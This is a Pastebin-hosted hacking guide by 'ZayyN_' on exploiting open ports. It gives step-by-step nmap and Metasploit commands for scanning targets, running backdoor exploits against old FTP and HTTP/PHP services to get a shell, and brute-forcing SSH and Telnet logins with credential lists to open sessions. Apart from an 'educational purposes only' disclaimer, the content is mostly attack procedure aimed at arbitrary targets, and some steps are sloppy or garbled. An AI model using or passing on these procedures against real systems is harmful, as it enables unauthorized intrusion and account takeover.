Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______________________________________________
- | ╔╗ ╔╗ |
- | ╔╝╚╗ ║║ |
- | ╔══╦══╦══╦══╗ ╔══╦══╦╩╗╔╬══╗ ╔══╦╗╔╦╦═╝╠══╗ |
- | ║╔╗║╔╗║ ═╣╔╗║ ║╔╗║╔╗║╔╣║║ ═╣ ║╔╗║║║╠╣╔╗║ ═╣ |
- | ║╚╝║╚╝║ ═╣║║║ ║╚╝║╚╝║║║╚╬═ ║ ║╚╝║╚╝║║╚╝║ ═╣ |
- | ╚══╣╔═╩══╩╝╚╝ ║╔═╩══╩╝╚═╩══╝ ╚═╗╠══╩╩══╩══╝ |
- | ║║ ║║ ╔═╝║ |
- | ╚╝ ╚╝ ╚══╝ |
- |______________________________________________|
- | |
- | * Guid written by ZayyN_ |
- | * Discord: ZayyN_#2829 |
- |______________________________________________|
- | |
- | Requirements: • Linux - OS (Kali, Parrot) |
- | • nmap |
- | • msfconsole |
- | • A little bit of brain cells |
- |______________________________________________|
- ============================
- About open port exploiting
- ============================
- - The methods that ethical hackers commonly used are very similar and simple...
- - This guide is for educational purposes only !!!
- - Do not use these methods without permission !!!
- - I am not responsible for any of your actions caused by this manual !!!
- Common ports ...
- 80, 88, 443, 21, 22, 23,
- ############################################################################################################
- # #
- # • FTP - [21 Default] - Possible to exploit #
- # • SSH - [22 Default] - !! Impossible to exploit !! - Strong security / Brute force is commonly used #
- # • TELNET - [23 Default] - Old - Ez to exploit - Brute force is commonly used #
- # • HTTP - [80, 88 Default] - Possible to exploit #
- # • HTTPS - [443 Default] - Possible to exploit #
- # #
- ############################################################################################################
- ==========================
- NMAP
- ==========================
- Aggresive scan [Universal scan]
- • nmap -A <target>
- Scan open ports ...
- • nmap -sV <target>
- Scan uncommon open ports ...
- • nmap -sV -p- <target>
- ==========================
- ftp metasploit exploit (only old versions)
- ==========================
- 1.) Ping the ftp server for getting ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap ...
- • nmap -sV <target>
- 3.) Search exploit for current ftp version ... (in terminal)
- • searchsploit <ftp-version>
- 4.) Open msfconsole as root and search ftp version exploit
- • search <ftp-exploit>
- 5.) Then coppy the backdoor exploit name and type following commands
- • use exploit/unix/ftp/<exploit-version>
- • set RHOST <ftp-ip>
- • set RPORT <ftp-port>
- • set payload cmd/unix/interact
- • exploit
- 6.) When u do all the steps correctly u have to exploit the ftp ... now the shell will pop up
- ===========================
- http metasploit exploit (only old versions)
- ===========================
- 1.) Ping the server for getting ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get http port... (Default is 80)
- • nmap -sV <target>
- 3.) Open msfconsole as root and search http version exploit
- • search auxiliary/scanner/http/http_version
- 5.) Use the exploit ....
- • use auxiliary/scanner/http/http_version
- • set RHOST <http-ip>
- • set RPORT <http-port>
- • run
- 6.) Now u can clearly see the http version... So we can exploit it more :P Scan for valid php exploits and run in msfconsole
- • searchsploit <http-version> | grep php -(in terminal)
- • grep cgi search <php-version> -(in msfconsole)
- • use 1
- • show options
- • set RHOST <http-ip>
- • set RPORT <http-port>
- • run
- 7.) When corect steps was made... U have full access
- • Try sysinfo for idetify OS of the php
- ===========================
- ssh metasploit bruteforce (all versions)
- ===========================
- 1.) Ping the server for getting ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get ssh port...
- • nmap -sV <target>
- 3.) Open msfconsole as root and search ftp version exploit
- • search auxiliary/scanner/ssh/ssh_login
- 5.) Use the exploit ....
- • use auxiliary/scanner/ssh/ssh_login
- • set RHOST <ssh-ip>
- • set RPORT <ssh-port>
- • set VERBOSE true
- • set USER_FILE <path>
- • set PASS_FILE <path>
- • set STOP_ON_SUCCES true
- • run
- 6.) When corect credential has found u can create session ...
- • sessions -i 1
- ==============================
- telnet metasploit bruteforce (all versions)
- ==============================
- 1.) Ping the server for getting ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get port...
- • nmap -sV <target>
- 3.) Open msfconsole as root and use telnet exploit
- • use auxiliary/scanner/telnet/telnet_login
- • set RHOST <target-ip>
- • set RPORT <telnet-port>
- • set VERBOSE true
- • set USER_FILE <path>
- • set PASS_FILE <path>
- • set STOP_ON_SUCCES true
- • run
- 4.) When corect credential has found u can create session ...
- • sessions -i 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement